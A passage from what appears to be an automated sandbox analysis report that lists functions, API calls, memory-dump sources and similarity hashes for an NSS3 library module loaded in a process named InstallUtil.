                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,6C78C97F,?,?,?), ref: 6C7A04BF
                                                                                                                  • TlsGetValue.KERNEL32(00000000,?,6C78C97F,?,?,?), ref: 6C7A04F4
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,6C78C97F,?,?,?), ref: 6C7A050D
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,6C78C97F,?,?,?), ref: 6C7A0556
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Alloc_CriticalEnterSectionUnlockUtilValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 349578545-0
                                                                                                                  • Opcode ID: fdf09ed11569580fdecc88248e480f392824c0b5c0333eef33bc94a7171cb995
                                                                                                                  • Instruction ID: ec443a28326cd33cda0a0c1532fca925c492e39531c344c9ba5551ee75db0ffe
                                                                                                                  • Opcode Fuzzy Hash: fdf09ed11569580fdecc88248e480f392824c0b5c0333eef33bc94a7171cb995
                                                                                                                  • Instruction Fuzzy Hash: A5415074A016429FDB14DF69C644A69BBF4FF44318F158A7DD86A8BB01E730E892CF80
                                                                                                                  Function 6C86A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C86A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C86A662), ref: 6C86A69E
                                                                                                                    • Part of subcall function 6C86A690: PR_NewCondVar.NSS3(?), ref: 6C86A6B4
                                                                                                                  • PR_IntervalNow.NSS3 ref: 6C86A8C6
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86A8EB
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86A944
                                                                                                                  • PR_SetPollableEvent.NSS3(?), ref: 6C86A94F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 811965633-0
                                                                                                                  • Opcode ID: 7d2abae94adafab5503d0ff97cf2734b4447695073eabab6c659924797222bbc
                                                                                                                  • Instruction ID: 95920c4dea04e2277ee983a8bf1d93642a0efff52a5c4687070bd3e02e4eee38
                                                                                                                  • Opcode Fuzzy Hash: 7d2abae94adafab5503d0ff97cf2734b4447695073eabab6c659924797222bbc
                                                                                                                  • Instruction Fuzzy Hash: 93415CB4A01A129FC724CF2AC680996FBF5FF48318725896AD55ACBF11E731F850CB90
                                                                                                                  Function 6C756C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C756C8D
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C756CA9
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C756CC0
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C878FE0), ref: 6C756CFE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2370200771-0
                                                                                                                  • Opcode ID: 3d153c1fdb858946ef26ff9ee3100aa9d19b51c77e6956dff5d38353cfb2ca3f
                                                                                                                  • Instruction ID: 103a6ec665dadcfcb9550edf82cebe02264806891d2c6e2c000acee485fa66f9
                                                                                                                  • Opcode Fuzzy Hash: 3d153c1fdb858946ef26ff9ee3100aa9d19b51c77e6956dff5d38353cfb2ca3f
                                                                                                                  • Instruction Fuzzy Hash: 3D3190B1A002169FEB08CF65C995ABFBBF5EF45248F50483DD905E7710EB31AA15CBA0
                                                                                                                  Function 6C864F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C864F5D
                                                                                                                  • free.MOZGLUE(?), ref: 6C864F74
                                                                                                                  • free.MOZGLUE(?), ref: 6C864F82
                                                                                                                  • GetLastError.KERNEL32 ref: 6C864F90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$CreateErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 17951984-0
                                                                                                                  • Opcode ID: d96ce617444a89248daccb7fc117a15d0636beb200a39fb25fdc00e53fb1feaa
                                                                                                                  • Instruction ID: 496d671e15975f0e6800ddafc4584560e8b70ba0d9e7cd8ebf2786c3dffe27fd
                                                                                                                  • Opcode Fuzzy Hash: d96ce617444a89248daccb7fc117a15d0636beb200a39fb25fdc00e53fb1feaa
                                                                                                                  • Instruction Fuzzy Hash: 47314BB5A002095BDB11CBAAED51BDFB3B8FFC5358F040625EC15A7B81DB35A904C791
                                                                                                                  Function 6C7C6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_MillisecondsToInterval.NSS3(?), ref: 6C7C6E36
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7C6E57
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_MillisecondsToInterval.NSS3(?), ref: 6C7C6E7D
                                                                                                                  • PR_MillisecondsToInterval.NSS3(?), ref: 6C7C6EAA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3163584228-0
                                                                                                                  • Opcode ID: f4468a531038c8f07edda02fe8c7a860492691cf0595ae6d603a4994a9313cb3
                                                                                                                  • Instruction ID: e4aa06b3767da290b44324ff5a4806314bb6405e41cc86ca9424ce3922ab3ad8
                                                                                                                  • Opcode Fuzzy Hash: f4468a531038c8f07edda02fe8c7a860492691cf0595ae6d603a4994a9313cb3
                                                                                                                  • Instruction Fuzzy Hash: BA31C331714517EEDB145F34DE483A6B7A8BB0131AF14063ED899D6A41E730B654CF83
                                                                                                                  Function 6C7B8530 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,?,6C7B72EC), ref: 6C7B855A
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6C7B72EC), ref: 6C7B859E
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C7B72EC), ref: 6C7B85B8
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,6C7B72EC), ref: 6C7B8600
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1727503455-0
                                                                                                                  • Opcode ID: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
                                                                                                                  • Instruction ID: 85be2b20d97d37a7c5b9f403e21c8100df92358f782a2668f489333ef2f773ca
                                                                                                                  • Opcode Fuzzy Hash: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
                                                                                                                  • Instruction Fuzzy Hash: 8C21F872A002175BE7008F2DDF44B6B76A9AF8131CF65413AE865E7750EB31D806C7A1
                                                                                                                  Function 6C7C2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C7C2896
                                                                                                                  • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C7C2932
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7C294C
                                                                                                                  • free.MOZGLUE(?), ref: 6C7C2955
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Encoder_Finish$Arena_FreeUtilfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 508480814-0
                                                                                                                  • Opcode ID: 1623d7337d0f90e7c4b5a96de0c4ae8b39a483808657221ece8e0c309109f708
                                                                                                                  • Instruction ID: 4e0e5e009dd5a808dc0b5a702041ac056786703403f1bb7c1ea54dd99918b6db
                                                                                                                  • Opcode Fuzzy Hash: 1623d7337d0f90e7c4b5a96de0c4ae8b39a483808657221ece8e0c309109f708
                                                                                                                  • Instruction Fuzzy Hash: CB21D6B67006019FE7209B26EE4DF577BE5AF84358F044538E489C7B61FB31E4188752
                                                                                                                  Function 6C794FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C79B60F,00000000), ref: 6C795003
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C79B60F,00000000), ref: 6C79501C
                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C79B60F,00000000), ref: 6C79504B
                                                                                                                  • free.MOZGLUE(?,00000000,00000000,00000000,?,6C79B60F,00000000), ref: 6C795064
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1112172411-0
                                                                                                                  • Opcode ID: f57951a6d9e5f4c32712fdabc9fde8f45f4021b2e17d4141fa776c0e59b9709d
                                                                                                                  • Instruction ID: 21e8b579924b1e423d5ae37e24dcd3c87457b9b71d2ebc016bf250dce067a681
                                                                                                                  • Opcode Fuzzy Hash: f57951a6d9e5f4c32712fdabc9fde8f45f4021b2e17d4141fa776c0e59b9709d
                                                                                                                  • Instruction Fuzzy Hash: 3A3116B0A05A069FDB40EF78E58466ABBF4FF08308F158629D8599B701E731E891CBD1
                                                                                                                  Function 6C7404D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?), ref: 6C7404F1
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C74053B
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C740558
                                                                                                                  • GetLastError.KERNEL32 ref: 6C74057A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3051374878-0
                                                                                                                  • Opcode ID: 1414a0a8af504b6648aa73d4b474a0fe77635bbccdb7c728205f1bec49168dcf
                                                                                                                  • Instruction ID: 2af889e26d22d9b52dfd6bab66818ca3159d7449db8c28d6e9087d2ef9643c4e
                                                                                                                  • Opcode Fuzzy Hash: 1414a0a8af504b6648aa73d4b474a0fe77635bbccdb7c728205f1bec49168dcf
                                                                                                                  • Instruction Fuzzy Hash: ED218071A00118AFDB04DFA8DC94AAEB7B8FF48318B108429E809DB301D775ED02CBD0
                                                                                                                  Function 6C7C2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?), ref: 6C7C2E08
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PORT_NewArena_Util.NSS3(00000400), ref: 6C7C2E1C
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C7C2E3B
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7C2E95
                                                                                                                    • Part of subcall function 6C7B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B1228
                                                                                                                    • Part of subcall function 6C7B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7B1238
                                                                                                                    • Part of subcall function 6C7B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B124B
                                                                                                                    • Part of subcall function 6C7B1200: PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B125D
                                                                                                                    • Part of subcall function 6C7B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7B126F
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7B1280
                                                                                                                    • Part of subcall function 6C7B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7B128E
                                                                                                                    • Part of subcall function 6C7B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7B129A
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7B12A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1441289343-0
                                                                                                                  • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                  • Instruction ID: 8c44a8bbf6b352e5cbf822a8f82487dde03827683dc4f9a1cad117a4ba25593e
                                                                                                                  • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                  • Instruction Fuzzy Hash: B521C2B1F003464FE700CF549E4CBAA3768AF9170CF211279DD087B642F7B1E69882A2
                                                                                                                  Function 6C77ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CERT_NewCertList.NSS3 ref: 6C77ACC2
                                                                                                                    • Part of subcall function 6C752F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C752F0A
                                                                                                                    • Part of subcall function 6C752F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C752F1D
                                                                                                                    • Part of subcall function 6C752AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C750A1B,00000000), ref: 6C752AF0
                                                                                                                    • Part of subcall function 6C752AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C752B11
                                                                                                                  • CERT_DestroyCertList.NSS3(00000000), ref: 6C77AD5E
                                                                                                                    • Part of subcall function 6C7957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C75B41E,00000000,00000000,?,00000000,?,6C75B41E,00000000,00000000,00000001,?), ref: 6C7957E0
                                                                                                                    • Part of subcall function 6C7957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C795843
                                                                                                                  • CERT_DestroyCertList.NSS3(?), ref: 6C77AD36
                                                                                                                    • Part of subcall function 6C752F50: CERT_DestroyCertificate.NSS3(?), ref: 6C752F65
                                                                                                                    • Part of subcall function 6C752F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C752F83
                                                                                                                  • free.MOZGLUE(?), ref: 6C77AD4F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 132756963-0
                                                                                                                  • Opcode ID: f57ac3500a8bb43ecf200352812d72f95d98828129ad7cd19f2a4b8fa2fe31f7
                                                                                                                  • Instruction ID: 4a66397e4685046b32549688a739436d001e228d2819878ef9ebba9c9c77541b
                                                                                                                  • Opcode Fuzzy Hash: f57ac3500a8bb43ecf200352812d72f95d98828129ad7cd19f2a4b8fa2fe31f7
                                                                                                                  • Instruction Fuzzy Hash: 6D2184B1D001189BEF20DFA4EA0A5EE77B4AF05258F455078D81977601FB31EA55CBF1
                                                                                                                  Function 6C7924E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7924FF
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79250F
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79253C
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C792554
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
